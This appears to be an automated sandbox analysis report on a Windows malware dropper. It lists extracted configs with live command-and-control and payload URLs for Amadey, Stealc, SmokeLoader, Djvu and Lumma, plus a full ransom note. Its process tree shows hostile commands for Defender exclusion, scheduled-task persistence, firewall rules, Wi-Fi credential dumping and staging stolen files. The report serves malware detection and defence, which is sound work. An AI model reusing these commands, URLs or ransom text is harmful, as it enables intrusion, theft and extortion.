Analysis
-
max time kernel
215s -
max time network
301s -
platform
windows10-1703_x64 -
resource
win10-20240221-en -
resource tags
-
submitted
25-03-2024 05:04
General
-
Target
dd1eee466259aafb709f18510d8b3ffa879ea2b20cd8f833e71ef667997e3c94.exe
-
Size
1.8MB
-
MD5
241ea04a17229bb942e8472c04c70ed2
-
SHA1
1f5e91eb8c748d7f0e6e67aa4ddccf401a028713
-
SHA256
dd1eee466259aafb709f18510d8b3ffa879ea2b20cd8f833e71ef667997e3c94
-
SHA512
0f931265f2a1e827f367ede9ca78d06832b6560deef4d6147aaae916c52a474bbe568b4ea426eb2796d48e7fcb7222d37d1015eab75dc1c8187f4f8d95ec5de2
-
SSDEEP
49152:yuNj+ombSmNcFBlv0/YQ7v+uqVj59l8sSh9uXPWA:/yoCyIQyyVlD8sg9uB
Malware Config
Extracted
amadey
4.18
http://193.233.132.56
-
install_dir
09fd851a4f
-
install_file
explorha.exe
-
strings_key
443351145ece4966ded809641c77cfa8
-
url_paths
/Pneh2sXQk0/index.php
Extracted
smokeloader
pub1
Extracted
stealc
http://185.172.128.209
-
url_path
/3cd2b41cbde8fc9c.php
Extracted
smokeloader
2022
http://trad-einmyus.com/index.php
http://tradein-myus.com/index.php
http://trade-inmyus.com/index.php
Extracted
amadey
4.17
http://193.233.132.167
-
strings_key
1a9519d7b465e1f4880fa09a6162d768
-
url_paths
/enigma/index.php
Extracted
djvu
http://sajdfue.com/test1/get.php
-
extension
.vook
-
offline_id
1eSPzWRaNslCgtjBZfL5pzvovoiaVI4IZSnvAwt1
-
payload_url
http://sdfjhuz.com/dl/build2.exe
http://sajdfue.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. Do not ask assistants from youtube and recovery data sites for help in recovering your data. They can use your free decryption quota and scam you. Our contact is emails in this text document only. You can get and look video overview decrypt tool: https://wetransfer.com/downloads/3ed7a617738550b0a00c5aa231c0752020240316170955/d71ce1 Price of private key and decrypt software is $999. Discount 50% available if you contact us first 72 hours, that's price for you is $499. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0857PsawqS
Extracted
lumma
https://resergvearyinitiani.shop/api
https://associationokeo.shop/api
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
DcRat 20 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detected Djvu ransomware 2 IoCs
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba payload 6 IoCs
-
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Stealc
Stealc is an infostealer written in C++.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Windows security bypass 2 TTPs 7 IoCs
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
-
Blocklisted process makes network request 5 IoCs
-
Downloads MZ/PE file
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 17 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 55 IoCs
-
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 13 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
UPX packed file 4 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Windows security modification 2 TTPs 7 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 6 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
-
Drops file in System32 directory 17 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
-
Suspicious use of SetThreadContext 7 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 4 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Drops file in Windows directory 8 IoCs
-
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 6 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 19 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 7 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 14 IoCs
-
Suspicious use of SendNotifyMessage 10 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
c:\windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\dd1eee466259aafb709f18510d8b3ffa879ea2b20cd8f833e71ef667997e3c94.exe"C:\Users\Admin\AppData\Local\Temp\dd1eee466259aafb709f18510d8b3ffa879ea2b20cd8f833e71ef667997e3c94.exe"1⤵
- DcRat
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000022001\101ee3e9b0.exe"C:\Users\Admin\AppData\Local\Temp\1000022001\101ee3e9b0.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
-
-
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\1000035001\lumma21.exe"C:\Users\Admin\AppData\Local\Temp\1000035001\lumma21.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh wlan show profiles5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\531961169161_Desktop.zip' -CompressionLevel Optimal5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exeC:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exeC:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000082001\boom8.exe"C:\Users\Admin\AppData\Local\Temp\1000082001\boom8.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN boom8.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000082001\boom8.exe" /F3⤵
- DcRat
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Local\Temp\1000172001\ISetup8.exe"C:\Users\Admin\AppData\Local\Temp\1000172001\ISetup8.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\u2dk.0.exe"C:\Users\Admin\AppData\Local\Temp\u2dk.0.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\CGIEBAFHJJ.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\CGIEBAFHJJ.exe"C:\Users\Admin\AppData\Local\Temp\CGIEBAFHJJ.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\CGIEBAFHJJ.exe7⤵
-
C:\Windows\SysWOW64\PING.EXEping 2.2.2.2 -n 1 -w 30008⤵
- Runs ping.exe
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\u2dk.1.exe"C:\Users\Admin\AppData\Local\Temp\u2dk.1.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F6⤵
- DcRat
- Creates scheduled task(s)
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub1.exe"C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub1.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Local\Temp\1000174001\4767d2e713f2021e8fe856e3ea638b58.exe"C:\Users\Admin\AppData\Local\Temp\1000174001\4767d2e713f2021e8fe856e3ea638b58.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\1000174001\4767d2e713f2021e8fe856e3ea638b58.exe"C:\Users\Admin\AppData\Local\Temp\1000174001\4767d2e713f2021e8fe856e3ea638b58.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\531961169161_Desktop.zip' -CompressionLevel Optimal4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main2⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Temp\1000085001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000085001\file300un.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\.BLRVzdv\svchost.exe"' & exit3⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\.BLRVzdv\svchost.exe"'4⤵
- DcRat
- Creates scheduled task(s)
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\sksb3Vq6UgmggO6M9FSJ0MRU.exe"C:\Users\Admin\Pictures\sksb3Vq6UgmggO6M9FSJ0MRU.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\us0.0.exe"C:\Users\Admin\AppData\Local\Temp\us0.0.exe"5⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\us0.1.exe"C:\Users\Admin\AppData\Local\Temp\us0.1.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "6⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12517⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F7⤵
- DcRat
- Creates scheduled task(s)
-
-
-
-
-
C:\Users\Admin\Pictures\BYDsobPlYIaPQUmbx1bUoW4j.exe"C:\Users\Admin\Pictures\BYDsobPlYIaPQUmbx1bUoW4j.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ukg.0.exe"C:\Users\Admin\AppData\Local\Temp\ukg.0.exe"5⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\ukg.1.exe"C:\Users\Admin\AppData\Local\Temp\ukg.1.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "6⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12517⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F7⤵
- DcRat
- Creates scheduled task(s)
-
-
-
-
-
C:\Users\Admin\Pictures\hjF2ryOaTfc5MgY5eKpf1a52.exe"C:\Users\Admin\Pictures\hjF2ryOaTfc5MgY5eKpf1a52.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
-
-
C:\Users\Admin\Pictures\hjF2ryOaTfc5MgY5eKpf1a52.exe"C:\Users\Admin\Pictures\hjF2ryOaTfc5MgY5eKpf1a52.exe"5⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
-
-
-
C:\Users\Admin\Pictures\M9P61e8RHuqcsIIBgDxUeiBV.exe"C:\Users\Admin\Pictures\M9P61e8RHuqcsIIBgDxUeiBV.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 6326⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5092 -s 5846⤵
- Program crash
-
-
-
-
C:\Users\Admin\Pictures\xoFdRIHBUhDdwuhUrg1yj8Ep.exe"C:\Users\Admin\Pictures\xoFdRIHBUhDdwuhUrg1yj8Ep.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
-
-
C:\Users\Admin\Pictures\xoFdRIHBUhDdwuhUrg1yj8Ep.exe"C:\Users\Admin\Pictures\xoFdRIHBUhDdwuhUrg1yj8Ep.exe"5⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
-
-
-
C:\Users\Admin\Pictures\LCCYCiJnONu5XblEgq4hVa11.exe"C:\Users\Admin\Pictures\LCCYCiJnONu5XblEgq4hVa11.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
-
-
C:\Users\Admin\Pictures\LCCYCiJnONu5XblEgq4hVa11.exe"C:\Users\Admin\Pictures\LCCYCiJnONu5XblEgq4hVa11.exe"5⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
-
-
-
C:\Users\Admin\Pictures\32QktHrXloGtfKRiegMSKzUn.exe"C:\Users\Admin\Pictures\32QktHrXloGtfKRiegMSKzUn.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\fI07eSFT03w2dZJ3Mls6GxLk.exe"C:\Users\Admin\Pictures\fI07eSFT03w2dZJ3Mls6GxLk.exe" --silent --allusers=04⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\Pictures\fI07eSFT03w2dZJ3Mls6GxLk.exeC:\Users\Admin\Pictures\fI07eSFT03w2dZJ3Mls6GxLk.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.40 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6abc21f8,0x6abc2204,0x6abc22105⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\fI07eSFT03w2dZJ3Mls6GxLk.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\fI07eSFT03w2dZJ3Mls6GxLk.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\Pictures\fI07eSFT03w2dZJ3Mls6GxLk.exe"C:\Users\Admin\Pictures\fI07eSFT03w2dZJ3Mls6GxLk.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1352 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240325050637" --session-guid=ffac7ea8-8fa9-4bc8-9f4a-a79d8d58c62d --server-tracking-blob=ZmQ5NWZkNjNjODMyMmU1MzI1Y2ZlYWYwNzYxZmNmMDU2YjliMTk3MDVlNmRlMzcwMTQ1OWRhMDkzMjBhOTRkYzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxMTM0MzE4NC4yNzIyIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJiNzBhYWY4OC00OGM4LTQyZjktOTg0My05ZWE1MTZhMjI3YzkifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=54040000000000005⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\Pictures\fI07eSFT03w2dZJ3Mls6GxLk.exeC:\Users\Admin\Pictures\fI07eSFT03w2dZJ3Mls6GxLk.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.40 --initial-client-data=0x2c0,0x2c4,0x2c8,0x290,0x2cc,0x6a2421f8,0x6a242204,0x6a2422106⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403250506371\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403250506371\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"5⤵
-
-
